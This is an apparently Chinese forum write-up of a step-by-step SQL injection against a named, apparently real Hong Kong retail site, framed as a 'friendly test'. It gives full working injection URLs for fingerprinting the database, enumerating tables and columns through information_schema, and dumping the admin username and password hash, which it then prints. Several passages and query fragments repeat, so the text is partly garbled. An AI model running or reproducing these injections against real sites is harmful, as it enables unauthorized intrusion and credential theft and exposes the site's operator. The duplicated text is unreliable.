近期出現了百度被黑事件,Google又退出CN,一連串的東西,那麼,今天給大家來一個***手記,希望大家會喜歡,但是事先說明,本次此次爲友情檢測,並無其他惡意,並把相應的東西通知站長了!本文涉及真實的網址,希望各位不要使用本文章作違法行爲!
首先,獲得信息,加一個單引號提交http://www.babydaily.com.hk/newsDetail.php?id=53’返回如下信息,
從以上的錯誤信息可以判斷2點,
第一,使用的是MySQL數據庫,
第二,magic_quotes_gpc設置爲on或者使用了addslashes()函數,使得單引號被轉換爲\'.但前者的可能性較大。
繼續,這裏要查看一下數據庫版本,這個很重要,後面會解釋,
第一,使用的是MySQL數據庫,
第二,magic_quotes_gpc設置爲on或者使用了addslashes()函數,使得單引號被轉換爲\'.但前者的可能性較大。
繼續,這裏要查看一下數據庫版本,這個很重要,後面會解釋,
得到以上提示,看來是select的列數不匹配,我們用order by來解決,
既然列數是19繼續提交http://www.babydaily.com.hk/newsDetail.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19我們得到以下的東西
(這裏我把id改成了-1,省去寫and 1=2),把14改成(select @@version)
提交[email=select%20@@version),15,16,17,18,19]http://www.babydaily.com.hk/newsDetail.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,(select%20@@version),15,16,17,18,19[/email],返回以下信息
提交[email=select%20@@version),15,16,17,18,19]http://www.babydaily.com.hk/newsDetail.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,(select%20@@version),15,16,17,18,19[/email],返回以下信息
這樣,我們就知道community 版本了,看看數據庫名,把@@version換成database()提交,返回以下信息,
以下內容需要回復才能看到
同樣,獲得當前數據庫連接用戶名 [email=babydaily_dhost@localhost]babydaily_dhost@localhost[/email],查看MySQL用戶名,提交http://www.babydaily.com.hk/newsDetail.php?id=-1%20union%20all%20select%201,(select%20user%20from20mysql.user),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
命令被拒絕執行,看來權限不夠,如果不是administrator權限,數據庫的表名是無法查看的,但是從5.0版本之後,mysql5比之前增加的系統數據庫information_schema的結構,它是用來存儲數據庫系統信息的,這也就是之前爲什麼要查看數據庫版本的原因了,利用這個結構,可以查看數據庫一些詳細的信息,比如,查看一下當前用戶的權限,提交http://www.babydaily.com.hk/newsDetail.php?id=-1%20union%20all%20select%201,grantee,3,4,5,privilege_type,7,8,9,10,11,12,13,is_grantable,15,16,17,18,19%20from%20information_schema.user_privileges 返回如下信息
可以看到權限是相當的小,這樣,loadfile()函數也沒法用,本來想select 一句話 into dumpfile(這裏也可以換成outfile,但是outfile出來的文件查看的話會包含一些特殊字符,或者省略一些字符),但是弄了幾次,總是出現語法錯誤,還是老老實實的select用戶名和密碼吧,但是目前表名,字段一個都不知道,幸好有這個information_schema結構,
好了,靜下心來,慢慢的遍歷數據庫的表名,經過n+N+N次的的注入,終於猜完了數據庫的表明,這裏給出史上最長的注入語句:
http://www.babydaily.com.hk/newsDetail.php?id=-1%20union%20all%20select%
201,table_name,3,4,5,table_schema,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%
20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20!=%
//這裏限定了只查看當前database有關的數據
200x63617465%20and%20table_name%20!=%200x636F6C6F72%20and%20table_name%20!=%
200x636F75706F6E%20and%20table_name%20!=%200x63757272656E6379%20and%20table_name%20!=%
200x64657369676E5F696E646578%20and%20table_name%20!=%200x656D61696C5F636F6E74656E74%
20and%20table_name%20!=%200x666F6F746572%20and%20table_name%20!=%200x6D656D626572%20and%
20table_name%20!=%200x6E657773%20and%20table_name%20!=%200x70616765%20and%20table_name%
20!=%200x706167655F6D616E616765%20and%20table_name%20!=%200x7061795F6D616E616765%20and%
20table_name%20!=%200x706F696E7473%20and%20table_name%20!=%200x70726F64756374%20and%
20table_name%20!=%200x70726F647563745F636F6C6F72%20and%20table_name%20!=% 200x70726F647563745F6F72646572%20and%20table_name%20!=%
200x70726F647563745F6F726465725F6974656D%20and%20table_name%20!=%
200x70726F647563745F6F726465725F737461747573%20and%20table_name%20!=%
200x70726F647563745F70686F746F%20and%20table_name%20!=%200x636173685F706F696E7473%20and%
20table_name%20!=%200x70726F647563745F70686F746F62616E6E6572%20and%20table_name%20!=%
200x70726F647563745F73697A65%20and%20table_name%20!=%200x70726F647563745F766964656F%
20and%20table_name%20!=%200x7365745F73746F636B%20and%20table_name%20!=%
200x7368697070696E675F64657374696E6174696F6E%20and%20table_name%20!=%
200x7368697070696E675F64657374696E6174696F6E5F70726F66696C65%20and%20table_name%20!=%
200x7368697070696E675F666565%20and%20table_name%20!=%
200x7368697070696E675F6665655F64657461696C%20and%20table_name%20!=%
200x7368697070696E675F6D6574686F64%20and%20table_name%20!=%
200x73686F7070696E67
201,table_name,3,4,5,table_schema,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%
20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20!=%
//這裏限定了只查看當前database有關的數據
200x63617465%20and%20table_name%20!=%200x636F6C6F72%20and%20table_name%20!=%
200x636F75706F6E%20and%20table_name%20!=%200x63757272656E6379%20and%20table_name%20!=%
200x64657369676E5F696E646578%20and%20table_name%20!=%200x656D61696C5F636F6E74656E74%
20and%20table_name%20!=%200x666F6F746572%20and%20table_name%20!=%200x6D656D626572%20and%
20table_name%20!=%200x6E657773%20and%20table_name%20!=%200x70616765%20and%20table_name%
20!=%200x706167655F6D616E616765%20and%20table_name%20!=%200x7061795F6D616E616765%20and%
20table_name%20!=%200x706F696E7473%20and%20table_name%20!=%200x70726F64756374%20and%
20table_name%20!=%200x70726F647563745F636F6C6F72%20and%20table_name%20!=% 200x70726F647563745F6F72646572%20and%20table_name%20!=%
200x70726F647563745F6F726465725F6974656D%20and%20table_name%20!=%
200x70726F647563745F6F726465725F737461747573%20and%20table_name%20!=%
200x70726F647563745F70686F746F%20and%20table_name%20!=%200x636173685F706F696E7473%20and%
20table_name%20!=%200x70726F647563745F70686F746F62616E6E6572%20and%20table_name%20!=%
200x70726F647563745F73697A65%20and%20table_name%20!=%200x70726F647563745F766964656F%
20and%20table_name%20!=%200x7365745F73746F636B%20and%20table_name%20!=%
200x7368697070696E675F64657374696E6174696F6E%20and%20table_name%20!=%
200x7368697070696E675F64657374696E6174696F6E5F70726F66696C65%20and%20table_name%20!=%
200x7368697070696E675F666565%20and%20table_name%20!=%
200x7368697070696E675F6665655F64657461696C%20and%20table_name%20!=%
200x7368697070696E675F6D6574686F64%20and%20table_name%20!=%
200x73686F7070696E67
5F656D61696C%20and%20table_name%20!=%200x75736572
由於程序將單引號轉義爲\',這裏只能轉換成16進制,也可以用ASCII,但是換成char語句太長了,個人選擇,
這裏面每一個16進制數代表一個table_name,每列出一個,增加一個 where != 語句,繼續爆下一個,最後得到的全部表名是
table_name
{CHARACTER_SETS,COLLATIONS,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,
由於程序將單引號轉義爲\',這裏只能轉換成16進制,也可以用ASCII,但是換成char語句太長了,個人選擇,
這裏面每一個16進制數代表一個table_name,每列出一個,增加一個 where != 語句,繼續爆下一個,最後得到的全部表名是
table_name
{CHARACTER_SETS,COLLATIONS,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,
PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,cash_points,cate,color,coupon,currency,
design_index,email_content,footer,member,news,page,page_manage,pay_manage,points,product,
product_color,product_order,product_order_item,product_order_status,product_photo,product_photobanner,
product_size,product_video,set_stock,shipping_destination,shipping_destination_profile,shipping_fee,ship
ping_fee_detail,shipping_method,shopping_email,user}
ping_fee_detail,shipping_method,shopping_email,user}
這裏也許你會說沒必要得到全部的表名,只要得到管理員的表就行啊,爲什麼不用limit語句呢,原理上是可以的,但是limit語句在某些情況下會被限制,不通用,看了下那一堆的table_name,看來管理員的賬號和密碼只能在user裏了,
那繼續來遍歷user表,還是採用老辦法,語句集合
同理,每個16進制數代表一個字段,最後得到的全部字段集合
schema_column{id,score,display,name,password}
schema_column{id,score,display,name,password}
好了,現在好辦了,直接爆賬號和密碼,提交:http://www.babydaily.com.hk/newsDetail.php?id=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,(select%20concat(name,char(58),password)%20from%20user),15,16,17,18,19%20from%20user
返回 babydaily:7960e55c9a63f19d1ba3760bd0876e41
哈哈,終於搞到了,密碼也可以破解,但是楞是沒找到後臺,算了,還是別弄了,然後e-mail給管理員了,這次就當一次練習吧!
總結一下:
本次檢測實在是運氣不怎麼好,但是還是可以讓人學習不少東西的!
一,magic_quotes_gpc爲on,單引號被屏蔽,
二,權限相當的小,loadfile函數不能用
一,magic_quotes_gpc爲on,單引號被屏蔽,
二,權限相當的小,loadfile函數不能用
本文涉及真實的網址,希望各位不要使用本文章作違法行爲!